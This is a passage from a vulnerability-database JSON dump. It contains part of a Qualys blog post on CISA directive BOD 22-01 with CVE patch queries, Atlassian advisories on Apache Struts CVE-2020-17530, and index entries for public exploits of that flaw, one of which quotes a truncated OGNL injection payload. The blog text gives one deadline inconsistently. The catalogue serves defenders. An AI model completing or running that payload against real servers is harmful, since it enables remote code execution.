Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months or by **May 3, 2022**.\n\n## Detect CISA&#x27;s Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and gather your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the [&quot;CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES&quot;](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most &quot;Category 2&quot; vulnerabilities by **November 17, 2021**, and &quot;Category 3&quot; by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive&#x27;s aggressive remediation date of November 17, 2021. Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:[&#x27;CVE-2021-1732\u2032,&#x27;CVE-2020-1350\u2032,&#x27;CVE-2020-1472\u2032,&#x27;CVE-2021-26855\u2032,&#x27;CVE-2021-26858\u2032,&#x27;CVE-2021-27065\u2032,&#x27;CVE-2020-0601\u2032,&#x27;CVE-2021-26857\u2032,&#x27;CVE-2021-22893\u2032,&#x27;CVE-2020-8243\u2032,&#x27;CVE-2021-22900\u2032,&#x27;CVE-2021-22894\u2032,&#x27;CVE-2020-8260\u2032,&#x27;CVE-2021-22899\u2032,&#x27;CVE-2019-11510&#x27;]\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it&#x27;s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configurations changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but partial part of threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. Qualys customers rely on the accuracy of Qualys&#x27; threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "atlassian": [{"lastseen": "2023-06-06T15:31:08", "description": "Update Apache Struts to 2.5.26 to avoid\u00a0[CVE-2020-17530|https://cwiki.apache.org/confluence/display/ww/s2-061]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-22T11:35:48", "type": "atlassian", "title": "Update Apache Struts 2 to avoid CVE-2020-17530", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-09-16T05:28:34", "id": "CWD-5688", "href": "https://jira.atlassian.com/browse/CWD-5688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-16T06:43:42", "description": "Update Apache Struts to 2.5.26 to avoid\u00a0[CVE-2020-17530|https://cwiki.apache.org/confluence/display/ww/s2-061]", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T11:35:48", "type": "atlassian", "title": "Update Apache Struts 2 to avoid CVE-2020-17530", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-09-16T05:28:34", "id": "ATLASSIAN:CWD-5688", "href": "https://jira.atlassian.com/browse/CWD-5688", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-13T15:38:59", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2023-01-30T21:21:15", "id": "CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:40:37", "description": "Atlassian Confluence Server and Data Center is *not affected* by CVE-2019-0230 (Apache Struts Potential Remote Code Execution Vulnerability).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-09-14T01:58:06", "type": "atlassian", "title": "CVE-2019-0230 - Apache Struts Potential Remote Code Execution Vulnerability [Confluence Server is not affected]", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0230"], "modified": "2020-11-19T05:03:06", "id": "ATLASSIAN:CONFSERVER-60264", "href": "https://jira.atlassian.com/browse/CONFSERVER-60264", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-08-21T03:44:55", "description": "h3. Issue Summary\r\nRecently, Apache released the following report regarding two different vulnerabilities in Struts 2:\r\n\r\n[|https://struts.apache.org/announce.html#a20200813]\r\n\r\nIs Confluence affected by these CVEs?\r\n\r\nh3. Steps to Reproduce\r\n Not applicable.\r\n\r\nh3. Expected Results\r\n Not applicable\r\n\r\nh3. Actual Results\r\n Not applicable\r\n\r\nh3. Workaround\r\n Not applicable\r\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-08-18T13:48:36", "type": "atlassian", "title": "Struts 2 CVE-2019-0230 and CVE-2019-0233 impact on Confluence", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0233", "CVE-2019-0230"], "modified": "2020-08-21T00:02:20", "id": "ATLASSIAN:CONFSERVER-60189", "href": "https://jira.atlassian.com/browse/CONFSERVER-60189", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-08-17T17:39:02", "description": "# CVE-2020-17530\n\ns2-061\n\npoc:\n\n`\n%{(#instancemanager=#applicati...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-09T09:53:08", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-04-15T01:43:32", "id": "3640EAF9-330F-508E-A488-D3A51649AD96", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-19T20:44:05", "description": "# CVE-2020-17530\nApache Struts2\u6846\u67b6\u662f\u4e00\u4e2a\u7528\u4e8e\u5f00\u53d1Java EE\u7f51\u7edc\u5e94\u7528\u7a0b\u5e8f\u7684Web\u6846\u67b6\u3002Apac...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-08T11:10:46", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-03-19T17:50:51", "id": "C878132C-FB46-5C51-9D3B-B87DB3578112", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# freemarker_RCE_struts2_s2-061\n(c...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-18T07:03:57", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2020-12-18T07:05:31", "id": "B2E1F725-D74D-5E81-88CC-6530BC9BAB30", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-01T00:00:00", "description": "# CVE-2020-17530-s2-061\n> s2-061\u56fe\u5f62\u5316\u754c\u9762\u7684exp\uff0con...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-24T07:51:31", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2021-01-24T08:15:39", "id": "BC46DAAE-9274-500B-A6A2-DB7DA8EAF068", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-23T13:38:20", "description": "S2-061\n\n\u811a\u672c\u7686\u6839\u636evulhub\u7684struts2-059/061\u6f0f\u6d1e\u6d4b\u8bd5\u73af\u5883\u6765\u5199\u7684\uff0c\u4e0d\u5177\u666e\u904d\u6027\uff0c\u8fd8\u671b\u5927\u4f6c\u591a\u591a\u6307\u6559\n\n- s...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-10T17:42:37", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-06-23T05:10:40", "id": "32FB08A0-ACB0-5E2F-8691-570E7B806086", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-26T20:54:51", "description": "# CVE-2020-17530\n\nQuick POC for [CVE-2020-17530](https://nvd.nis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-30T17:23:20", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Apache Struts", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-17530"], "modified": "2022-07-26T16:55:43", "id": 